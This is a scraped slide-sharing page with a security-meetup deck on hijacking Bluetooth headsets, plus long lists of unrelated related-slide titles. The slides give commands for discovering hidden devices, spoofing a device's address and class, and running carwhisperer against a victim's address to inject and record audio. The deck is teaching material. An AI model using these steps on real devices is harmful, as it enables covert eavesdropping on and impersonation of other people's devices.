SlideShare a Scribd company logo
By
Swaroop YermalkaR
1. Finding Visible & Invisible
Bluetooth Devices along with their
           specifications



                                     2. Cloning Bluetooth Devices



   3. Remotely Inject audio in
 Bluetooth headsets and record
         audio from it.
BT5 r3 laptop   Nokia Bluetooth   Bluetooth Dongle   Galaxy
                   Headset
                                                      pop
๏‚ง79 channels 2.4-GHz ISM band
๏‚งDevices hop across these channels at a rate of 1600 times per second
๏‚งBluetooth Device Address (BD_ADDR)
Source: www.techtree.com
Initial Setup
1. Everything is in visible




                 Android Settings   Ubuntu Settings
Find a target First
#hcitool scan




                #hcitool inq
btscanner
Bluemaho
2. Letโ€™s Find the Invisible Devicesโ€ฆ




   Source: http://hwaddress.com/
Letโ€™s Find the Invisible Devicesโ€ฆ
Android Settings
Start sniffing




   Sniff on
   mon0
SAMSUNG
It is Samsung device
We have:
                00:07:AB:ff:CF:88

~MAC address plus one
           ~ MAC address minus 1




            ~MAC address minus one




                    FOUND!!!
#hcitool inq <bd_addr>
Enumerate the services for further attack
Recall Previous
Informationโ€ฆ
#hcitool scan




#bdaddr -i hci1 <new_bd_addr>
#hciconfig hci1 name โ€œandroidโ€




                        #hciconfig hci0 class 0x58020c
Observe the Fields
Laptop
Why to Clone the bluetooth device?


๏ƒ˜In certain premises, some bluetooth type device may be
restricted. Does it still bother you? ๏Š

๏ƒ˜For many attacks such as attacks on bluetooth headset it is
necessary to make our device headset compatible.
Is our bluetooth
  dongle headset
  compatible?




No? change its
class.
Device conforms to the Headset Profile
Find your victim
Download url:
http://trifinite.org/Downloads/carwhispe
rer-0.2.tar.gz
#./carwhisperer <interface> <injecting audio file> <Output
file> <victim BD_ADDR>
๏‚งBuilt on AIRcable XRโ„ข long-range
technology

๏‚ง1 km external antenna included

๏‚งExtended range for up to 30 km***

๏‚งNo external power needed

๏‚งAluminum case for reduced interference
and increased sensitivity
1. Bluetooth Hacking: The state of art by
              trifinite.org

              2. Bluetooth Wiki


Yi-Bing Lin
Oct-2012    Sep-2012      Nov-2012

           www.chmag.in
Feedback, questions and
       suggestions:
swaroop.wireless@gmail.com

More Related Content

What's hot

Prinsip moral agama katolik 1 lia
Prinsip moral agama katolik 1 liaPrinsip moral agama katolik 1 lia
Prinsip moral agama katolik 1 lia
Gadjah Mada University
ย 
perkembangan media komunikasi
perkembangan media komunikasiperkembangan media komunikasi
perkembangan media komunikasi
Yuliawanti Ginaris
ย 
7 Tradisi Komunikasi
7 Tradisi Komunikasi7 Tradisi Komunikasi
7 Tradisi Komunikasi
Gadis Octory
ย 
1a ekologi media komunikasi
1a ekologi media komunikasi1a ekologi media komunikasi
1a ekologi media komunikasiJoni Minggulius
ย 
Perang Dingin/Cold war with Hyperlink
Perang Dingin/Cold war with HyperlinkPerang Dingin/Cold war with Hyperlink
Perang Dingin/Cold war with Hyperlink
redinna azhalia
ย 
Indepth News Reporting
Indepth News Reporting   Indepth News Reporting
Indepth News Reporting boysinu
ย 
Makalah Psikologi komunikator dan psikologi pesan
Makalah Psikologi komunikator dan psikologi pesanMakalah Psikologi komunikator dan psikologi pesan
Makalah Psikologi komunikator dan psikologi pesan
Lingga - Universitas Riau
ย 
Soraya ratna pratiwi - teori media baru (new media theory)
Soraya ratna pratiwi  - teori media baru (new media theory)Soraya ratna pratiwi  - teori media baru (new media theory)
Soraya ratna pratiwi - teori media baru (new media theory)
Soraya Ratna
ย 
Makalah Filsafat Ilmu dan Logika - Manusia menurut Ahli Filsafat
Makalah Filsafat Ilmu dan Logika - Manusia menurut Ahli FilsafatMakalah Filsafat Ilmu dan Logika - Manusia menurut Ahli Filsafat
Makalah Filsafat Ilmu dan Logika - Manusia menurut Ahli Filsafat
Nasruddin Asnah
ย 
Konsep dan model komunikasi massa
Konsep dan model komunikasi massaKonsep dan model komunikasi massa
Konsep dan model komunikasi massaReni Kurniati
ย 
Paradigma Teologi Pembebasan
Paradigma Teologi PembebasanParadigma Teologi Pembebasan
Paradigma Teologi Pembebasan
Sri Wahyuni
ย 
Teori Ekologi Media
Teori Ekologi MediaTeori Ekologi Media
Teori Ekologi Media
mankoma2012
ย 
Face Negotiation Theory
Face Negotiation TheoryFace Negotiation Theory
Face Negotiation Theorymankoma2013
ย 
Science and Knowledge
Science and KnowledgeScience and Knowledge
Science and Knowledge
Mulawarman University
ย 
Ideologi ideologi besar
Ideologi ideologi besarIdeologi ideologi besar
Ideologi ideologi besar
idbloginfo
ย 
Plato
PlatoPlato
Sejarah hak asasi
Sejarah hak asasiSejarah hak asasi
Sejarah hak asasi
Nita Mardiana
ย 
Gender dan Negosiasi
Gender dan NegosiasiGender dan Negosiasi
Gender dan Negosiasi
AdePutraTunggali
ย 
PERANG DINGIN
PERANG DINGINPERANG DINGIN
PERANG DINGIN
Yunita Nurul Aeni
ย 
Sistem komunikasi massa.ppt
Sistem komunikasi massa.pptSistem komunikasi massa.ppt
Sistem komunikasi massa.ppt
Eka Ariyanti
ย 

What's hot (20)

Prinsip moral agama katolik 1 lia
Prinsip moral agama katolik 1 liaPrinsip moral agama katolik 1 lia
Prinsip moral agama katolik 1 lia
ย 
perkembangan media komunikasi
perkembangan media komunikasiperkembangan media komunikasi
perkembangan media komunikasi
ย 
7 Tradisi Komunikasi
7 Tradisi Komunikasi7 Tradisi Komunikasi
7 Tradisi Komunikasi
ย 
1a ekologi media komunikasi
1a ekologi media komunikasi1a ekologi media komunikasi
1a ekologi media komunikasi
ย 
Perang Dingin/Cold war with Hyperlink
Perang Dingin/Cold war with HyperlinkPerang Dingin/Cold war with Hyperlink
Perang Dingin/Cold war with Hyperlink
ย 
Indepth News Reporting
Indepth News Reporting   Indepth News Reporting
Indepth News Reporting
ย 
Makalah Psikologi komunikator dan psikologi pesan
Makalah Psikologi komunikator dan psikologi pesanMakalah Psikologi komunikator dan psikologi pesan
Makalah Psikologi komunikator dan psikologi pesan
ย 
Soraya ratna pratiwi - teori media baru (new media theory)
Soraya ratna pratiwi  - teori media baru (new media theory)Soraya ratna pratiwi  - teori media baru (new media theory)
Soraya ratna pratiwi - teori media baru (new media theory)
ย 
Makalah Filsafat Ilmu dan Logika - Manusia menurut Ahli Filsafat
Makalah Filsafat Ilmu dan Logika - Manusia menurut Ahli FilsafatMakalah Filsafat Ilmu dan Logika - Manusia menurut Ahli Filsafat
Makalah Filsafat Ilmu dan Logika - Manusia menurut Ahli Filsafat
ย 
Konsep dan model komunikasi massa
Konsep dan model komunikasi massaKonsep dan model komunikasi massa
Konsep dan model komunikasi massa
ย 
Paradigma Teologi Pembebasan
Paradigma Teologi PembebasanParadigma Teologi Pembebasan
Paradigma Teologi Pembebasan
ย 
Teori Ekologi Media
Teori Ekologi MediaTeori Ekologi Media
Teori Ekologi Media
ย 
Face Negotiation Theory
Face Negotiation TheoryFace Negotiation Theory
Face Negotiation Theory
ย 
Science and Knowledge
Science and KnowledgeScience and Knowledge
Science and Knowledge
ย 
Ideologi ideologi besar
Ideologi ideologi besarIdeologi ideologi besar
Ideologi ideologi besar
ย 
Plato
PlatoPlato
Plato
ย 
Sejarah hak asasi
Sejarah hak asasiSejarah hak asasi
Sejarah hak asasi
ย 
Gender dan Negosiasi
Gender dan NegosiasiGender dan Negosiasi
Gender dan Negosiasi
ย 
PERANG DINGIN
PERANG DINGINPERANG DINGIN
PERANG DINGIN
ย 
Sistem komunikasi massa.ppt
Sistem komunikasi massa.pptSistem komunikasi massa.ppt
Sistem komunikasi massa.ppt
ย 

Viewers also liked

Carwhisperer Bluetooth Attack
Carwhisperer Bluetooth AttackCarwhisperer Bluetooth Attack
Carwhisperer Bluetooth Attack
n|u - The Open Security Community
ย 
Attacking and Crashing IoT Devices via Bluetooth LE protocol
Attacking and Crashing IoT Devices via Bluetooth LE protocolAttacking and Crashing IoT Devices via Bluetooth LE protocol
Attacking and Crashing IoT Devices via Bluetooth LE protocol
Cysinfo Cyber Security Community
ย 
Seguridad En Bluetooth Y Windows Mobile
Seguridad En Bluetooth Y Windows MobileSeguridad En Bluetooth Y Windows Mobile
Seguridad En Bluetooth Y Windows Mobile
Chema Alonso
ย 
Sniffer para bluetooth
Sniffer para bluetoothSniffer para bluetooth
Sniffer para bluetooth
Jose Benitez
ย 
3GPP IMS
3GPP IMS3GPP IMS
3GPP IMS
Chris Venteicher
ย 
Seguridad en Bluetooth
Seguridad en BluetoothSeguridad en Bluetooth
Seguridad en Bluetooth
Alejandro Ramos
ย 
Bluetooth and profiles on WEC7
Bluetooth and profiles on WEC7Bluetooth and profiles on WEC7
Bluetooth and profiles on WEC7
gnkeshava
ย 
Bluetooth Vulnerabilities
Bluetooth VulnerabilitiesBluetooth Vulnerabilities
Bluetooth Vulnerabilities
VictorYee
ย 
About BLE server profile
About BLE server profile About BLE server profile
About BLE server profile
Lin Steven
ย 
Implementing Vulnerability Management
Implementing Vulnerability Management Implementing Vulnerability Management
Implementing Vulnerability Management
Argyle Executive Forum
ย 
8.realizacion de pruebas
8.realizacion de pruebas8.realizacion de pruebas
8.realizacion de pruebas
Jose Benรญtez Andrades
ย 
Ble overview and_implementation
Ble overview and_implementationBle overview and_implementation
Ble overview and_implementation
Stanley Chang
ย 
Bluetooth Secure Simple Pairing Using NFC Part 1
Bluetooth Secure Simple Pairing Using NFC Part 1 Bluetooth Secure Simple Pairing Using NFC Part 1
Bluetooth Secure Simple Pairing Using NFC Part 1
NFC Forum
ย 
IOT Exploitation
IOT Exploitation	IOT Exploitation
IOT Exploitation
Cysinfo Cyber Security Community
ย 
Security Analytics using ELK stack
Security Analytics using ELK stack	Security Analytics using ELK stack
Security Analytics using ELK stack
Cysinfo Cyber Security Community
ย 
Security in GSM(2G) and UMTS(3G) Networks
Security in GSM(2G) and UMTS(3G) NetworksSecurity in GSM(2G) and UMTS(3G) Networks
Security in GSM(2G) and UMTS(3G) Networks
Naveen Kumar
ย 
CNIT 129S: 10: Attacking Back-End Components
CNIT 129S: 10: Attacking Back-End ComponentsCNIT 129S: 10: Attacking Back-End Components
CNIT 129S: 10: Attacking Back-End Components
Sam Bowne
ย 
Bluetooth Security
Bluetooth SecurityBluetooth Security
Bluetooth Security
h_marvin
ย 
Bluetooth Low Energy - A Case Study
Bluetooth Low Energy - A Case StudyBluetooth Low Energy - A Case Study
Bluetooth Low Energy - A Case Study
FReeze FRancis
ย 
Automating Post Exploitation with PowerShell
Automating Post Exploitation with PowerShellAutomating Post Exploitation with PowerShell
Automating Post Exploitation with PowerShell
EnclaveSecurity
ย 

Viewers also liked (20)

Carwhisperer Bluetooth Attack
Carwhisperer Bluetooth AttackCarwhisperer Bluetooth Attack
Carwhisperer Bluetooth Attack
ย 
Attacking and Crashing IoT Devices via Bluetooth LE protocol
Attacking and Crashing IoT Devices via Bluetooth LE protocolAttacking and Crashing IoT Devices via Bluetooth LE protocol
Attacking and Crashing IoT Devices via Bluetooth LE protocol
ย 
Seguridad En Bluetooth Y Windows Mobile
Seguridad En Bluetooth Y Windows MobileSeguridad En Bluetooth Y Windows Mobile
Seguridad En Bluetooth Y Windows Mobile
ย 
Sniffer para bluetooth
Sniffer para bluetoothSniffer para bluetooth
Sniffer para bluetooth
ย 
3GPP IMS
3GPP IMS3GPP IMS
3GPP IMS
ย 
Seguridad en Bluetooth
Seguridad en BluetoothSeguridad en Bluetooth
Seguridad en Bluetooth
ย 
Bluetooth and profiles on WEC7
Bluetooth and profiles on WEC7Bluetooth and profiles on WEC7
Bluetooth and profiles on WEC7
ย 
Bluetooth Vulnerabilities
Bluetooth VulnerabilitiesBluetooth Vulnerabilities
Bluetooth Vulnerabilities
ย 
About BLE server profile
About BLE server profile About BLE server profile
About BLE server profile
ย 
Implementing Vulnerability Management
Implementing Vulnerability Management Implementing Vulnerability Management
Implementing Vulnerability Management
ย 
8.realizacion de pruebas
8.realizacion de pruebas8.realizacion de pruebas
8.realizacion de pruebas
ย 
Ble overview and_implementation
Ble overview and_implementationBle overview and_implementation
Ble overview and_implementation
ย 
Bluetooth Secure Simple Pairing Using NFC Part 1
Bluetooth Secure Simple Pairing Using NFC Part 1 Bluetooth Secure Simple Pairing Using NFC Part 1
Bluetooth Secure Simple Pairing Using NFC Part 1
ย 
IOT Exploitation
IOT Exploitation	IOT Exploitation
IOT Exploitation
ย 
Security Analytics using ELK stack
Security Analytics using ELK stack	Security Analytics using ELK stack
Security Analytics using ELK stack
ย 
Security in GSM(2G) and UMTS(3G) Networks
Security in GSM(2G) and UMTS(3G) NetworksSecurity in GSM(2G) and UMTS(3G) Networks
Security in GSM(2G) and UMTS(3G) Networks
ย 
CNIT 129S: 10: Attacking Back-End Components
CNIT 129S: 10: Attacking Back-End ComponentsCNIT 129S: 10: Attacking Back-End Components
CNIT 129S: 10: Attacking Back-End Components
ย 
Bluetooth Security
Bluetooth SecurityBluetooth Security
Bluetooth Security
ย 
Bluetooth Low Energy - A Case Study
Bluetooth Low Energy - A Case StudyBluetooth Low Energy - A Case Study
Bluetooth Low Energy - A Case Study
ย 
Automating Post Exploitation with PowerShell
Automating Post Exploitation with PowerShellAutomating Post Exploitation with PowerShell
Automating Post Exploitation with PowerShell
ย 

Similar to Hijacking bluetooth headsets

23c3 Bluetooth hacking revisited
23c3 Bluetooth hacking revisited23c3 Bluetooth hacking revisited
23c3 Bluetooth hacking revisited
Thierry Zoller
ย 
Hack.lu 2006 - All your Bluetooth is belong to us
Hack.lu 2006 - All your Bluetooth is belong to usHack.lu 2006 - All your Bluetooth is belong to us
Hack.lu 2006 - All your Bluetooth is belong to us
Thierry Zoller
ย 
All your Bluetooth is belong to us - the rest too.
All your Bluetooth is belong to us - the rest too.All your Bluetooth is belong to us - the rest too.
All your Bluetooth is belong to us - the rest too.
Thierry Zoller
ย 
Bluetooth
BluetoothBluetooth
Bluetooth
Bhushan Bagde
ย 
Bluetooth Presentation
Bluetooth PresentationBluetooth Presentation
Bluetooth Presentation
ankit680
ย 
IoThings you don't even need to hack
IoThings you don't even need to hackIoThings you don't even need to hack
IoThings you don't even need to hack
Slawomir Jasek
ย 
bluetooth-151010104202-lva1-app6891.docx
bluetooth-151010104202-lva1-app6891.docxbluetooth-151010104202-lva1-app6891.docx
bluetooth-151010104202-lva1-app6891.docx
LyricsJam
ย 
Bluetooth
BluetoothBluetooth
Bluetooth
Ujju146
ย 
Lukas Apa - Hacking Robots Before SkyNet
Lukas Apa - Hacking Robots Before SkyNet Lukas Apa - Hacking Robots Before SkyNet
Lukas Apa - Hacking Robots Before SkyNet
NoNameCon
ย 
The (Io)Things you don't even need to hack. Should we worry?
The (Io)Things you don't even need to hack. Should we worry?The (Io)Things you don't even need to hack. Should we worry?
The (Io)Things you don't even need to hack. Should we worry?
SecuRing
ย 
Bluetooth
BluetoothBluetooth
Bluetooth
Fahim Faysal
ย 
Asterisk: dongled !
Asterisk: dongled !Asterisk: dongled !
Asterisk: dongled !
Francesco Prior
ย 
DEFCON 23 - Matteo Becarro Matteo Collura - extracting the painf
DEFCON 23 - Matteo Becarro Matteo Collura - extracting the painfDEFCON 23 - Matteo Becarro Matteo Collura - extracting the painf
DEFCON 23 - Matteo Becarro Matteo Collura - extracting the painf
Felipe Prado
ย 
Bluetooth presentation
Bluetooth presentationBluetooth presentation
Bluetooth presentation
pratikpatilp
ย 
Bluetooth
BluetoothBluetooth
Bluetooth
candyweb
ย 
Bluetooth & Bluetooth Low Energy internals
Bluetooth & Bluetooth Low Energy internalsBluetooth & Bluetooth Low Energy internals
Bluetooth & Bluetooth Low Energy internals
Davy Jacops
ย 
Wireless security testing with attack by Keiichi Horiai - CODE BLUE 2015
Wireless security testing with attack by Keiichi Horiai - CODE BLUE 2015Wireless security testing with attack by Keiichi Horiai - CODE BLUE 2015
Wireless security testing with attack by Keiichi Horiai - CODE BLUE 2015
CODE BLUE
ย 
Voice encryption for gsm using arduino
Voice encryption for gsm using arduinoVoice encryption for gsm using arduino
Voice encryption for gsm using arduino
iruldaworld
ย 
Bluetooth Module
Bluetooth ModuleBluetooth Module
Bluetooth Module
Mohsen Sarakbi
ย 
Bluetooth technology [compatibility mode]
Bluetooth technology [compatibility mode]Bluetooth technology [compatibility mode]
Bluetooth technology [compatibility mode]
Ahsaan Arain
ย 

Similar to Hijacking bluetooth headsets (20)

23c3 Bluetooth hacking revisited
23c3 Bluetooth hacking revisited23c3 Bluetooth hacking revisited
23c3 Bluetooth hacking revisited
ย 
Hack.lu 2006 - All your Bluetooth is belong to us
Hack.lu 2006 - All your Bluetooth is belong to usHack.lu 2006 - All your Bluetooth is belong to us
Hack.lu 2006 - All your Bluetooth is belong to us
ย 
All your Bluetooth is belong to us - the rest too.
All your Bluetooth is belong to us - the rest too.All your Bluetooth is belong to us - the rest too.
All your Bluetooth is belong to us - the rest too.
ย 
Bluetooth
BluetoothBluetooth
Bluetooth
ย 
Bluetooth Presentation
Bluetooth PresentationBluetooth Presentation
Bluetooth Presentation
ย 
IoThings you don't even need to hack
IoThings you don't even need to hackIoThings you don't even need to hack
IoThings you don't even need to hack
ย 
bluetooth-151010104202-lva1-app6891.docx
bluetooth-151010104202-lva1-app6891.docxbluetooth-151010104202-lva1-app6891.docx
bluetooth-151010104202-lva1-app6891.docx
ย 
Bluetooth
BluetoothBluetooth
Bluetooth
ย 
Lukas Apa - Hacking Robots Before SkyNet
Lukas Apa - Hacking Robots Before SkyNet Lukas Apa - Hacking Robots Before SkyNet
Lukas Apa - Hacking Robots Before SkyNet
ย 
The (Io)Things you don't even need to hack. Should we worry?
The (Io)Things you don't even need to hack. Should we worry?The (Io)Things you don't even need to hack. Should we worry?
The (Io)Things you don't even need to hack. Should we worry?
ย 
Bluetooth
BluetoothBluetooth
Bluetooth
ย 
Asterisk: dongled !
Asterisk: dongled !Asterisk: dongled !
Asterisk: dongled !
ย 
DEFCON 23 - Matteo Becarro Matteo Collura - extracting the painf
DEFCON 23 - Matteo Becarro Matteo Collura - extracting the painfDEFCON 23 - Matteo Becarro Matteo Collura - extracting the painf
DEFCON 23 - Matteo Becarro Matteo Collura - extracting the painf
ย 
Bluetooth presentation
Bluetooth presentationBluetooth presentation
Bluetooth presentation
ย 
Bluetooth
BluetoothBluetooth
Bluetooth
ย 
Bluetooth & Bluetooth Low Energy internals
Bluetooth & Bluetooth Low Energy internalsBluetooth & Bluetooth Low Energy internals
Bluetooth & Bluetooth Low Energy internals
ย 
Wireless security testing with attack by Keiichi Horiai - CODE BLUE 2015
Wireless security testing with attack by Keiichi Horiai - CODE BLUE 2015Wireless security testing with attack by Keiichi Horiai - CODE BLUE 2015
Wireless security testing with attack by Keiichi Horiai - CODE BLUE 2015
ย 
Voice encryption for gsm using arduino
Voice encryption for gsm using arduinoVoice encryption for gsm using arduino
Voice encryption for gsm using arduino
ย 
Bluetooth Module
Bluetooth ModuleBluetooth Module
Bluetooth Module
ย 
Bluetooth technology [compatibility mode]
Bluetooth technology [compatibility mode]Bluetooth technology [compatibility mode]
Bluetooth technology [compatibility mode]
ย 

More from n|u - The Open Security Community

Hardware security testing 101 (Null - Delhi Chapter)
Hardware security testing 101 (Null - Delhi Chapter)Hardware security testing 101 (Null - Delhi Chapter)
Hardware security testing 101 (Null - Delhi Chapter)
n|u - The Open Security Community
ย 
Osint primer
Osint primerOsint primer
SSRF exploit the trust relationship
SSRF exploit the trust relationshipSSRF exploit the trust relationship
SSRF exploit the trust relationship
n|u - The Open Security Community
ย 
Nmap basics
Nmap basicsNmap basics
Metasploit primary
Metasploit primaryMetasploit primary
Metasploit primary
n|u - The Open Security Community
ย 
Api security-testing
Api security-testingApi security-testing
Api security-testing
n|u - The Open Security Community
ย 
Introduction to TLS 1.3
Introduction to TLS 1.3Introduction to TLS 1.3
Introduction to TLS 1.3
n|u - The Open Security Community
ย 
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
n|u - The Open Security Community
ย 
Talking About SSRF,CRLF
Talking About SSRF,CRLFTalking About SSRF,CRLF
Talking About SSRF,CRLF
n|u - The Open Security Community
ย 
Building active directory lab for red teaming
Building active directory lab for red teamingBuilding active directory lab for red teaming
Building active directory lab for red teaming
n|u - The Open Security Community
ย 
Owning a company through their logs
Owning a company through their logsOwning a company through their logs
Owning a company through their logs
n|u - The Open Security Community
ย 
Introduction to shodan
Introduction to shodanIntroduction to shodan
Introduction to shodan
n|u - The Open Security Community
ย 
Cloud security
Cloud security Cloud security
Detecting persistence in windows
Detecting persistence in windowsDetecting persistence in windows
Detecting persistence in windows
n|u - The Open Security Community
ย 
Frida - Objection Tool Usage
Frida - Objection Tool UsageFrida - Objection Tool Usage
Frida - Objection Tool Usage
n|u - The Open Security Community
ย 
OSQuery - Monitoring System Process
OSQuery - Monitoring System ProcessOSQuery - Monitoring System Process
OSQuery - Monitoring System Process
n|u - The Open Security Community
ย 
DevSecOps Jenkins Pipeline -Security
DevSecOps Jenkins Pipeline -SecurityDevSecOps Jenkins Pipeline -Security
DevSecOps Jenkins Pipeline -Security
n|u - The Open Security Community
ย 
Extensible markup language attacks
Extensible markup language attacksExtensible markup language attacks
Extensible markup language attacks
n|u - The Open Security Community
ย 
Linux for hackers
Linux for hackersLinux for hackers
Linux for hackers
n|u - The Open Security Community
ย 
Android Pentesting
Android PentestingAndroid Pentesting
Android Pentesting
n|u - The Open Security Community
ย 

More from n|u - The Open Security Community (20)

Hardware security testing 101 (Null - Delhi Chapter)
Hardware security testing 101 (Null - Delhi Chapter)Hardware security testing 101 (Null - Delhi Chapter)
Hardware security testing 101 (Null - Delhi Chapter)
ย 
Osint primer
Osint primerOsint primer
Osint primer
ย 
SSRF exploit the trust relationship
SSRF exploit the trust relationshipSSRF exploit the trust relationship
SSRF exploit the trust relationship
ย 
Nmap basics
Nmap basicsNmap basics
Nmap basics
ย 
Metasploit primary
Metasploit primaryMetasploit primary
Metasploit primary
ย 
Api security-testing
Api security-testingApi security-testing
Api security-testing
ย 
Introduction to TLS 1.3
Introduction to TLS 1.3Introduction to TLS 1.3
Introduction to TLS 1.3
ย 
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
ย 
Talking About SSRF,CRLF
Talking About SSRF,CRLFTalking About SSRF,CRLF
Talking About SSRF,CRLF
ย 
Building active directory lab for red teaming
Building active directory lab for red teamingBuilding active directory lab for red teaming
Building active directory lab for red teaming
ย 
Owning a company through their logs
Owning a company through their logsOwning a company through their logs
Owning a company through their logs
ย 
Introduction to shodan
Introduction to shodanIntroduction to shodan
Introduction to shodan
ย 
Cloud security
Cloud security Cloud security
Cloud security
ย 
Detecting persistence in windows
Detecting persistence in windowsDetecting persistence in windows
Detecting persistence in windows
ย 
Frida - Objection Tool Usage
Frida - Objection Tool UsageFrida - Objection Tool Usage
Frida - Objection Tool Usage
ย 
OSQuery - Monitoring System Process
OSQuery - Monitoring System ProcessOSQuery - Monitoring System Process
OSQuery - Monitoring System Process
ย 
DevSecOps Jenkins Pipeline -Security
DevSecOps Jenkins Pipeline -SecurityDevSecOps Jenkins Pipeline -Security
DevSecOps Jenkins Pipeline -Security
ย 
Extensible markup language attacks
Extensible markup language attacksExtensible markup language attacks
Extensible markup language attacks
ย 
Linux for hackers
Linux for hackersLinux for hackers
Linux for hackers
ย 
Android Pentesting
Android PentestingAndroid Pentesting
Android Pentesting
ย 

Recently uploaded

CIS 4200-02 Group 1 Final Project Report (1).pdf
CIS 4200-02 Group 1 Final Project Report (1).pdfCIS 4200-02 Group 1 Final Project Report (1).pdf
CIS 4200-02 Group 1 Final Project Report (1).pdf
blueshagoo1
ย 
Geography as a Discipline Chapter 1 __ Class 11 Geography NCERT _ Class Notes...
Geography as a Discipline Chapter 1 __ Class 11 Geography NCERT _ Class Notes...Geography as a Discipline Chapter 1 __ Class 11 Geography NCERT _ Class Notes...
Geography as a Discipline Chapter 1 __ Class 11 Geography NCERT _ Class Notes...
ImMuslim
ย 
Bonku-Babus-Friend by Sathyajith Ray (9)
Bonku-Babus-Friend by Sathyajith Ray  (9)Bonku-Babus-Friend by Sathyajith Ray  (9)
Bonku-Babus-Friend by Sathyajith Ray (9)
nitinpv4ai
ย 
Philippine Edukasyong Pantahanan at Pangkabuhayan (EPP) Curriculum
Philippine Edukasyong Pantahanan at Pangkabuhayan (EPP) CurriculumPhilippine Edukasyong Pantahanan at Pangkabuhayan (EPP) Curriculum
Philippine Edukasyong Pantahanan at Pangkabuhayan (EPP) Curriculum
MJDuyan
ย 
Oliver Asks for More by Charles Dickens (9)
Oliver Asks for More by Charles Dickens (9)Oliver Asks for More by Charles Dickens (9)
Oliver Asks for More by Charles Dickens (9)
nitinpv4ai
ย 
HYPERTENSION - SLIDE SHARE PRESENTATION.
HYPERTENSION - SLIDE SHARE PRESENTATION.HYPERTENSION - SLIDE SHARE PRESENTATION.
HYPERTENSION - SLIDE SHARE PRESENTATION.
deepaannamalai16
ย 
A Visual Guide to 1 Samuel | A Tale of Two Hearts
A Visual Guide to 1 Samuel | A Tale of Two HeartsA Visual Guide to 1 Samuel | A Tale of Two Hearts
A Visual Guide to 1 Samuel | A Tale of Two Hearts
Steve Thomason
ย 
220711130088 Sumi Basak Virtual University EPC 3.pptx
220711130088 Sumi Basak Virtual University EPC 3.pptx220711130088 Sumi Basak Virtual University EPC 3.pptx
220711130088 Sumi Basak Virtual University EPC 3.pptx
Kalna College
ย 
NIPER 2024 MEMORY BASED QUESTIONS.ANSWERS TO NIPER 2024 QUESTIONS.NIPER JEE 2...
NIPER 2024 MEMORY BASED QUESTIONS.ANSWERS TO NIPER 2024 QUESTIONS.NIPER JEE 2...NIPER 2024 MEMORY BASED QUESTIONS.ANSWERS TO NIPER 2024 QUESTIONS.NIPER JEE 2...
NIPER 2024 MEMORY BASED QUESTIONS.ANSWERS TO NIPER 2024 QUESTIONS.NIPER JEE 2...
Payaamvohra1
ย 
Educational Technology in the Health Sciences
Educational Technology in the Health SciencesEducational Technology in the Health Sciences
Educational Technology in the Health Sciences
Iris Thiele Isip-Tan
ย 
Level 3 NCEA - NZ: A Nation In the Making 1872 - 1900 SML.ppt
Level 3 NCEA - NZ: A  Nation In the Making 1872 - 1900 SML.pptLevel 3 NCEA - NZ: A  Nation In the Making 1872 - 1900 SML.ppt
Level 3 NCEA - NZ: A Nation In the Making 1872 - 1900 SML.ppt
Henry Hollis
ย 
RESULTS OF THE EVALUATION QUESTIONNAIRE.pptx
RESULTS OF THE EVALUATION QUESTIONNAIRE.pptxRESULTS OF THE EVALUATION QUESTIONNAIRE.pptx
RESULTS OF THE EVALUATION QUESTIONNAIRE.pptx
zuzanka
ย 
Skimbleshanks-The-Railway-Cat by T S Eliot
Skimbleshanks-The-Railway-Cat by T S EliotSkimbleshanks-The-Railway-Cat by T S Eliot
Skimbleshanks-The-Railway-Cat by T S Eliot
nitinpv4ai
ย 
Andreas Schleicher presents PISA 2022 Volume III - Creative Thinking - 18 Jun...
Andreas Schleicher presents PISA 2022 Volume III - Creative Thinking - 18 Jun...Andreas Schleicher presents PISA 2022 Volume III - Creative Thinking - 18 Jun...
Andreas Schleicher presents PISA 2022 Volume III - Creative Thinking - 18 Jun...
EduSkills OECD
ย 
CHUYรŠN ฤแป€ ร”N TแบฌP Vร€ PHรT TRIแป‚N Cร‚U HแปŽI TRONG ฤแป€ MINH HแปŒA THI TแปT NGHIแป†P THPT ...
CHUYรŠN ฤแป€ ร”N TแบฌP Vร€ PHรT TRIแป‚N Cร‚U HแปŽI TRONG ฤแป€ MINH HแปŒA THI TแปT NGHIแป†P THPT ...CHUYรŠN ฤแป€ ร”N TแบฌP Vร€ PHรT TRIแป‚N Cร‚U HแปŽI TRONG ฤแป€ MINH HแปŒA THI TแปT NGHIแป†P THPT ...
CHUYรŠN ฤแป€ ร”N TแบฌP Vร€ PHรT TRIแป‚N Cร‚U HแปŽI TRONG ฤแป€ MINH HแปŒA THI TแปT NGHIแป†P THPT ...
Nguyen Thanh Tu Collection
ย 
Data Structure using C by Dr. K Adisesha .ppsx
Data Structure using C by Dr. K Adisesha .ppsxData Structure using C by Dr. K Adisesha .ppsx
Data Structure using C by Dr. K Adisesha .ppsx
Prof. Dr. K. Adisesha
ย 
How to Manage Reception Report in Odoo 17
How to Manage Reception Report in Odoo 17How to Manage Reception Report in Odoo 17
How to Manage Reception Report in Odoo 17
Celine George
ย 
Electric Fetus - Record Store Scavenger Hunt
Electric Fetus - Record Store Scavenger HuntElectric Fetus - Record Store Scavenger Hunt
Electric Fetus - Record Store Scavenger Hunt
RamseyBerglund
ย 
Wound healing PPT
Wound healing PPTWound healing PPT
Wound healing PPT
Jyoti Chand
ย 
Juneteenth Freedom Day 2024 David Douglas School District
Juneteenth Freedom Day 2024 David Douglas School DistrictJuneteenth Freedom Day 2024 David Douglas School District
Juneteenth Freedom Day 2024 David Douglas School District
David Douglas School District
ย 

Recently uploaded (20)

CIS 4200-02 Group 1 Final Project Report (1).pdf
CIS 4200-02 Group 1 Final Project Report (1).pdfCIS 4200-02 Group 1 Final Project Report (1).pdf
CIS 4200-02 Group 1 Final Project Report (1).pdf
ย 
Geography as a Discipline Chapter 1 __ Class 11 Geography NCERT _ Class Notes...
Geography as a Discipline Chapter 1 __ Class 11 Geography NCERT _ Class Notes...Geography as a Discipline Chapter 1 __ Class 11 Geography NCERT _ Class Notes...
